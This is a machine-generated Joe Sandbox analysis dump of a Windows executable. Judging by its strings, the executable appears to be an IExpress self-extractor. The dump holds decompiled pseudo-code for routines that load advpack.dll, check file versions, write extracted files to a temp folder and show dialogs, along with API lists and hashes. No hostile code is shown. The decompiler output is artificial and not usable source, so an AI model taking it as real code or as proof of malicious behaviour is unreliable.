                            0x009438f5
                            0x009438fb
                            0x00943901
                            0x00943901
                            0x00000000
                            0x0094390a
                            0x0094374b
                            0x0094374e
                            0x0094375c
                            0x00943764
                            0x00943769
                            0x0094376e
                            0x00943771
                            0x0094379c
                            0x0094379f
                            0x00000000
                            0x00000000
                            0x009437a3
                            0x009437a4
                            0x00000000
                            0x009437a4
                            0x00943773
                            0x00943777
                            0x00943778
                            0x0094377f
                            0x00943781
                            0x0094378e
                            0x0094378e
                            0x00943794
                            0x00000000
                            0x00943794
                            0x00943783
                            0x00000000
                            0x00000000
                            0x00943785
                            0x0094378c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094378c
                            0x00943750
                            0x00000000
                            0x0094372d
                            0x0094372d
                            0x0094396b
                            0x0094396b
                            0x0094396c
                            0x0094396e
                            0x0094396f
                            0x00943a1e
                            0x00943a1e
                            0x00943a22
                            0x00943a27
                            0x00943a3e
                            0x00943a3e

                            APIs
                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00943723
                            • MessageBeep.USER32(00000000), ref: 009439C3
                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 009439F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Message$BeepVersion
                            • String ID: 3$lenta
                            • API String ID: 2519184315-4216304122
                            • Opcode ID: 30b256d6473b5f4380357e39d99661c9c9ac6cc7fb6036c599c03b7f7161d749
                            • Instruction ID: de7e5e2d20f2cd08ea56648e0b22e4a186893cc49137e51a87b9c0d34d66f1bc
                            • Opcode Fuzzy Hash: 30b256d6473b5f4380357e39d99661c9c9ac6cc7fb6036c599c03b7f7161d749
                            • Instruction Fuzzy Hash: FF9104B1A152249BEB34CF35CD81FAAB7B4AB85304F1581A9D889DB281DB748F81DF01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00946495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                            				signed int _v8;
                            				char _v268;
                            				void* __edi;
                            				signed int _t9;
                            				signed char _t14;
                            				struct HINSTANCE__* _t15;
                            				void* _t18;
                            				CHAR* _t26;
                            				void* _t27;
                            				signed int _t28;
                            
                            				_t27 = __esi;
                            				_t18 = __ebx;
                            				_t9 =  *0x948004; // 0xec518a5e
                            				_v8 = _t9 ^ _t28;
                            				_push(__ecx);
                            				E00941781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            				_t26 = "advpack.dll";
                            				E0094658A( &_v268, 0x104, _t26);
                            				_t14 = GetFileAttributesA( &_v268);
                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                            					_t15 = LoadLibraryA(_t26);
                            				} else {
                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                            				}
                            				return E00946CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                            			}













                            0x00946495
                            0x00946495
                            0x009464a0
                            0x009464a7
                            0x009464ab
                            0x009464bd
                            0x009464c2
                            0x009464d3
                            0x009464df
                            0x009464e8
                            0x00946502
                            0x009464ee
                            0x009464f9
                            0x009464f9
                            0x00946516

                            APIs
                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 009464DF
                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 009464F9
                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00946502
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: LibraryLoad$AttributesFile
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                            • API String ID: 438848745-2613218439
                            • Opcode ID: 830a002c4e8749d282057fd0db4c96d86f7e8a8ad19634d2de4d54f1399d67c7
                            • Instruction ID: b1371c4a895310701d768a5e485209fa9779b5f35781f083c9e140765ec7155e
                            • Opcode Fuzzy Hash: 830a002c4e8749d282057fd0db4c96d86f7e8a8ad19634d2de4d54f1399d67c7
                            • Instruction Fuzzy Hash: 3501F4B4A58108ABDB20EB64DC49FEE7378EB97314F500295F585921C0DF70AECACB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E009428E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                            				void* _v8;
                            				char* _v12;
                            				intOrPtr _v16;
                            				void* _v20;
                            				intOrPtr _v24;
                            				int _v28;
                            				int _v32;
                            				void* _v36;
                            				int _v40;
                            				void* _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				long _t68;
                            				void* _t70;
                            				void* _t73;
                            				void* _t79;
                            				void* _t83;
                            				void* _t87;
                            				void* _t88;
                            				intOrPtr _t93;
                            				intOrPtr _t97;
                            				intOrPtr _t99;
                            				int _t101;
                            				void* _t103;
                            				void* _t106;
                            				void* _t109;
                            				void* _t110;
                            
                            				_v12 = __edx;
                            				_t99 = __ecx;
                            				_t106 = 0;
                            				_v16 = __ecx;
                            				_t87 = 0;
                            				_t103 = 0;
                            				_v20 = 0;
                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                            					L19:
                            					_t106 = 1;
                            				} else {
                            					_t62 = 0;
                            					_v8 = 0;
                            					while(1) {
                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                            						if(E00942773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                            							goto L20;
                            						}
                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                            						_v28 = _t68;
                            						if(_t68 == 0) {
                            							_t99 = _v16;
                            							_t70 = _v8 + _t99;
                            							_t93 = _v24;
                            							_t87 = _v20;
                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                            								goto L18;
                            							}
                            						} else {
                            							_t103 = GlobalAlloc(0x42, _t68);
                            							if(_t103 != 0) {
                            								_t73 = GlobalLock(_t103);
                            								_v36 = _t73;
                            								if(_t73 != 0) {
                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                            										L15:
                            										GlobalUnlock(_t103);
                            										_t99 = _v16;
                            										L18:
                            										_t87 = _t87 + 1;
                            										_t62 = _v8 + 0x3c;
                            										_v20 = _t87;
                            										_v8 = _v8 + 0x3c;
                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                            											continue;
                            										} else {
                            											goto L19;
                            										}
                            									} else {
                            										_t79 = _v44;
                            										_t88 = _t106;
                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                            										_t101 = _v28;
                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                            										_t97 = _v48;
                            										_v36 = _t83;
                            										_t109 = _t83;
                            										do {
                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00942A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00942A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                            											_t109 = _t109 + 0x18;
                            											_t88 = _t88 + 4;
                            										} while (_t88 < 8);
                            										_t87 = _v20;
                            										_t106 = 0;
                            										if(_v56 < 0 || _v64 > 0) {
                            											if(_v52 < _t106 || _v60 > _t106) {
                            												GlobalUnlock(_t103);
                            											} else {
                            												goto L15;
                            											}
                            										} else {
                            											goto L15;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L20;
                            					}
                            				}
                            				L20:
                            				 *_a8 = _t87;
                            				if(_t103 != 0) {
                            					GlobalFree(_t103);
                            				}
                            				return _t106;
                            			}

































                            0x009428f1
                            0x009428f4
                            0x009428f7
                            0x009428f9
                            0x009428fc
                            0x009428ff
                            0x00942901
                            0x00942907
                            0x00942a62
                            0x00942a64
                            0x0094290d
                            0x0094290d
                            0x0094290f
                            0x00942912
                            0x00942920
                            0x00942937
                            0x00000000
                            0x00000000
                            0x00942944
                            0x0094294a
                            0x0094294f
                            0x00942a2f
                            0x00942a32
                            0x00942a34
                            0x00942a37
                            0x00942a41
                            0x00000000
                            0x00000000
                            0x00942955
                            0x0094295e
                            0x00942962
                            0x00942969
                            0x0094296f
                            0x00942974
                            0x0094298c
                            0x00942a20
                            0x00942a21
                            0x00942a27
                            0x00942a4c
                            0x00942a4f
                            0x00942a50
                            0x00942a53
                            0x00942a56
                            0x00942a5c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009429b2
                            0x009429b2
                            0x009429b5
                            0x009429bd
                            0x009429c3
                            0x009429cc
                            0x009429d5
                            0x009429d7
                            0x009429da
                            0x009429dd
                            0x009429df
                            0x009429ec
                            0x009429f8
                            0x009429fc
                            0x009429ff
                            0x00942a02
                            0x00942a07
                            0x00942a0a
                            0x00942a0f
                            0x00942a19
                            0x00942a81
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00942a0f
                            0x0094298c
                            0x00942974
                            0x00942962
                            0x00000000
                            0x0094294f
                            0x00942912
                            0x00942a65
                            0x00942a68
                            0x00942a6c
                            0x00942a6f
                            0x00942a6f
                            0x00942a7d

                            APIs
                            • GlobalFree.KERNEL32 ref: 00942A6F
                              • Part of subcall function 00942773: CharUpperA.USER32(EC518A5E,00000000,00000000,00000000), ref: 009427A8
                              • Part of subcall function 00942773: CharNextA.USER32(0000054D), ref: 009427B5
                              • Part of subcall function 00942773: CharNextA.USER32(00000000), ref: 009427BC
                              • Part of subcall function 00942773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942829
                              • Part of subcall function 00942773: RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942852
                              • Part of subcall function 00942773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00942870
                              • Part of subcall function 00942773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009428A0
                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00943938,?,?,?,?,-00000005), ref: 00942958
                            • GlobalLock.KERNEL32 ref: 00942969
                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00943938,?,?,?,?,-00000005,?), ref: 00942A21
                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00942A81
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                            • String ID:
                            • API String ID: 3949799724-0
                            • Opcode ID: 980a23dc083a1df467467454910611ba6626689f9818aae67cba43416b37a99d
                            • Instruction ID: 4759c011d1650ea05138f72bef5e7f43e969ea6232f928a6d2ecf53c5bb39dfc
                            • Opcode Fuzzy Hash: 980a23dc083a1df467467454910611ba6626689f9818aae67cba43416b37a99d
                            • Instruction Fuzzy Hash: FB512635E00219EBDB25CF98C884EAEFBB9FF48700F54412AF955E3251DB319A41DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 32%
                            			E00944169(void* __eflags) {
                            				int _t18;
                            				void* _t21;
                            
                            				_t20 = E0094468F("FINISHMSG", 0, 0);
                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                            				if(_t21 != 0) {
                            					if(E0094468F("FINISHMSG", _t21, _t20) != 0) {
                            						if(lstrcmpA(_t21, "<None>") == 0) {
                            							L7:
                            							return LocalFree(_t21);
                            						}
                            						_push(0);
                            						_push(0x40);
                            						_push(0);
                            						_push(_t21);
                            						_t18 = 0x3e9;
                            						L6:
                            						E009444B9(0, _t18);
                            						goto L7;
                            					}
                            					_push(0);
                            					_push(0x10);
                            					_push(0);
                            					_push(0);
                            					_t18 = 0x4b1;
                            					goto L6;
                            				}
                            				return E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
                            			}





                            0x0094417d
                            0x0094418f
                            0x00944193
                            0x009441b7
                            0x009441d3
                            0x009441e6
                            0x00000000
                            0x009441e7
                            0x009441d5
                            0x009441d6
                            0x009441d8
                            0x009441d9
                            0x009441da
                            0x009441df
                            0x009441e1
                            0x00000000
                            0x009441e1
                            0x009441b9
                            0x009441ba
                            0x009441bc
                            0x009441bd
                            0x009441be
                            0x00000000
                            0x009441be
                            0x00000000

                            APIs
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,009430B4), ref: 00944189
                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,009430B4), ref: 009441E7
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                            • String ID: <None>$FINISHMSG
                            • API String ID: 3507850446-3091758298
                            • Opcode ID: 7f07eb4c8ac022d85fcf009edd1a5ee5051c7640010864a976f776ad78debd8a
                            • Instruction ID: b655503f3e3f6897a505c0928196c8de59d3a44167a01cff4b6c87c12e25059a
                            • Opcode Fuzzy Hash: 7f07eb4c8ac022d85fcf009edd1a5ee5051c7640010864a976f776ad78debd8a
                            • Instruction Fuzzy Hash: 4C01FFB53882243BF3242A654C96F7B268EDBEA799F114039B706E2190DAA8CC4141B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E009419E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                            				signed int _v8;
                            				char _v520;
                            				void* __esi;
                            				signed int _t11;
                            				void* _t14;
                            				void* _t23;
                            				void* _t27;
                            				void* _t33;
                            				struct HWND__* _t34;
                            				signed int _t35;
                            
                            				_t33 = __edi;
                            				_t27 = __ebx;
                            				_t11 =  *0x948004; // 0xec518a5e
                            				_v8 = _t11 ^ _t35;
                            				_t34 = _a4;
                            				_t14 = _a8 - 0x110;
                            				if(_t14 == 0) {
                            					_t32 = GetDesktopWindow();
                            					E009443D0(_t34, _t15);
                            					_v520 = 0;
                            					LoadStringA( *0x949a3c, _a16,  &_v520, 0x200);
                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                            					MessageBeep(0xffffffff);
                            					goto L6;
                            				} else {
                            					if(_t14 != 1) {
                            						L4:
                            						_t23 = 0;
                            					} else {
                            						_t32 = _a12;
                            						if(_t32 - 0x83d > 1) {
                            							goto L4;
                            						} else {
                            							EndDialog(_t34, _t32);
                            							L6:
                            							_t23 = 1;
                            						}
                            					}
                            				}
                            				return E00946CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                            			}













                            0x009419e0
                            0x009419e0
                            0x009419eb
                            0x009419f2
                            0x009419f9
                            0x009419fc
                            0x00941a01
                            0x00941a2a
                            0x00941a2e
                            0x00941a3e
                            0x00941a4f
                            0x00941a62
                            0x00941a6a
                            0x00000000
                            0x00941a03
                            0x00941a06
                            0x00941a20
                            0x00941a20
                            0x00941a08
                            0x00941a08
                            0x00941a14
                            0x00000000
                            0x00941a16
                            0x00941a18
                            0x00941a70
                            0x00941a72
                            0x00941a72
                            0x00941a14
                            0x00941a06
                            0x00941a81

                            APIs
                            • EndDialog.USER32(?,?), ref: 00941A18
                            • GetDesktopWindow.USER32 ref: 00941A24
                            • LoadStringA.USER32(?,?,00000200), ref: 00941A4F
                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00941A62
                            • MessageBeep.USER32(000000FF), ref: 00941A6A
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                            • String ID:
                            • API String ID: 1273765764-0
                            • Opcode ID: ace313cdc9143f2cbd1679599ed5c1dcade027201d1f7fa4bb4cbdfea6da7ac3
                            • Instruction ID: c7a33181fdbc6874d9e191da4d84475fa4fc2f43dbe05320dcf46f660bd46d5a
                            • Opcode Fuzzy Hash: ace313cdc9143f2cbd1679599ed5c1dcade027201d1f7fa4bb4cbdfea6da7ac3
                            • Instruction Fuzzy Hash: C411C435529109AFDB10EF64EE08FAE77B8EF4A300F108154F922D3191DA30AE41EB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00947155() {
                            				void* _v8;
                            				struct _FILETIME _v16;
                            				signed int _v20;
                            				union _LARGE_INTEGER _v24;
                            				signed int _t23;
                            				signed int _t36;
                            				signed int _t37;
                            				signed int _t39;
                            
                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                            				_t23 =  *0x948004; // 0xec518a5e
                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                            					GetSystemTimeAsFileTime( &_v16);
                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                            					_v8 = _v8 ^ GetCurrentProcessId();
                            					_v8 = _v8 ^ GetCurrentThreadId();
                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                            					QueryPerformanceCounter( &_v24);
                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                            					_t39 = _t36;
                            					if(_t36 == 0xbb40e64e || ( *0x948004 & 0xffff0000) == 0) {
                            						_t36 = 0xbb40e64f;
                            						_t39 = 0xbb40e64f;
                            					}
                            					 *0x948004 = _t39;
                            				}
                            				_t37 =  !_t36;
                            				 *0x948008 = _t37;
                            				return _t37;
                            			}











                            0x0094715d
                            0x00947161
                            0x00947165
                            0x00947178
                            0x00947182
                            0x0094718e
                            0x00947197
                            0x009471a0
                            0x009471b1
                            0x009471b8
                            0x009471c4
                            0x009471c7
                            0x009471cb
                            0x009471d5
                            0x009471da
                            0x009471da
                            0x009471dc
                            0x009471dc
                            0x009471e2
                            0x009471e5
                            0x009471ee

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00947182
                            • GetCurrentProcessId.KERNEL32 ref: 00947191
                            • GetCurrentThreadId.KERNEL32 ref: 0094719A
                            • GetTickCount.KERNEL32 ref: 009471A3
                            • QueryPerformanceCounter.KERNEL32(?), ref: 009471B8
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                            • String ID:
                            • API String ID: 1445889803-0
                            • Opcode ID: ce01d974f7de00aa4154ce591234063ceaa6f9f8047b430e0a1752765a3edc92
                            • Instruction ID: b063145254bc4e624fd0ba22d56ad2d0ccfdc88e5c3e21d269a87a66ac98df6a
                            • Opcode Fuzzy Hash: ce01d974f7de00aa4154ce591234063ceaa6f9f8047b430e0a1752765a3edc92
                            • Instruction Fuzzy Hash: 7511F879D29208AFCB10DBF8EA48A9EB7F8EB4E315F614855D805E7210EB309A049B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E009463C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                            				signed int _v8;
                            				char _v268;
                            				long _v272;
                            				void* _v276;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t15;
                            				long _t28;
                            				struct _OVERLAPPED* _t37;
                            				void* _t39;
                            				signed int _t40;
                            
                            				_t15 =  *0x948004; // 0xec518a5e
                            				_v8 = _t15 ^ _t40;
                            				_v272 = _v272 & 0x00000000;
                            				_push(__ecx);
                            				_v276 = _a16;
                            				_t37 = 1;
                            				E00941781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            				E0094658A( &_v268, 0x104, _a12);
                            				_t28 = 0;
                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                            				if(_t39 != 0xffffffff) {
                            					_t28 = _a4;
                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                            						 *0x949124 = 0x80070052;
                            						_t37 = 0;
                            					}
                            					CloseHandle(_t39);
                            				} else {
                            					 *0x949124 = 0x80070052;
                            					_t37 = 0;
                            				}
                            				return E00946CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                            			}















                            0x009463cb
                            0x009463d2
                            0x009463d8
                            0x009463ea
                            0x009463f3
                            0x00946401
                            0x00946402
                            0x00946410
                            0x00946415
                            0x00946433
                            0x00946438
                            0x00946449
                            0x00946463
                            0x0094646d
                            0x00946477
                            0x00946477
                            0x0094647a
                            0x0094643a
                            0x0094643a
                            0x00946444
                            0x00946444
                            0x00946492

                            APIs
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094642D
                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094645B
                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094647A
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009463EB
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleWrite
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            • API String ID: 1065093856-3699071305
                            • Opcode ID: 08c1742377f549235892a3a466cd0de3b8a2f35969910339b810aba21a800908
                            • Instruction ID: 6557f4d3fbad7228aee51894ce297dc063fa58ff60671e3078f4a5b4a1ce8737
                            • Opcode Fuzzy Hash: 08c1742377f549235892a3a466cd0de3b8a2f35969910339b810aba21a800908
                            • Instruction Fuzzy Hash: B021D2B5A04218ABDB20DF25DC85FEB776CEB8A314F0041A9F585A3290DAB45D848FA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E009447E0(intOrPtr* __ecx) {
                            				intOrPtr _t6;
                            				intOrPtr _t9;
                            				void* _t11;
                            				void* _t19;
                            				intOrPtr* _t22;
                            				void _t24;
                            				struct HWND__* _t25;
                            				struct HWND__* _t26;
                            				void* _t27;
                            				intOrPtr* _t28;
                            				intOrPtr* _t33;
                            				void* _t34;
                            
                            				_t33 = __ecx;
                            				_t34 = LocalAlloc(0x40, 8);
                            				if(_t34 != 0) {
                            					_t22 = _t33;
                            					_t27 = _t22 + 1;
                            					do {
                            						_t6 =  *_t22;
                            						_t22 = _t22 + 1;
                            					} while (_t6 != 0);
                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                            					 *_t34 = _t24;
                            					if(_t24 != 0) {
                            						_t28 = _t33;
                            						_t19 = _t28 + 1;
                            						do {
                            							_t9 =  *_t28;
                            							_t28 = _t28 + 1;
                            						} while (_t9 != 0);
                            						E00941680(_t24, _t28 - _t19 + 1, _t33);
                            						_t11 =  *0x9491e0; // 0x3087c30
                            						 *(_t34 + 4) = _t11;
                            						 *0x9491e0 = _t34;
                            						return 1;
                            					}
                            					_t25 =  *0x948584; // 0x0
                            					E009444B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                            					LocalFree(_t34);
                            					L2:
                            					return 0;
                            				}
                            				_t26 =  *0x948584; // 0x0
                            				E009444B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                            				goto L2;
                            			}















                            0x009447e8
                            0x009447f0
                            0x009447f4
                            0x0094480f
                            0x00944811
                            0x00944814
                            0x00944814
                            0x00944816
                            0x00944817
                            0x00944829
                            0x0094482b
                            0x0094482f
                            0x0094484f
                            0x00944852
                            0x00944855
                            0x00944855
                            0x00944857
                            0x00944858
                            0x00944860
                            0x00944865
                            0x0094486a
                            0x0094486f
                            0x00000000
                            0x00944876
                            0x00944831
                            0x00944841
                            0x00944847
                            0x0094480b
                            0x00000000
                            0x0094480b
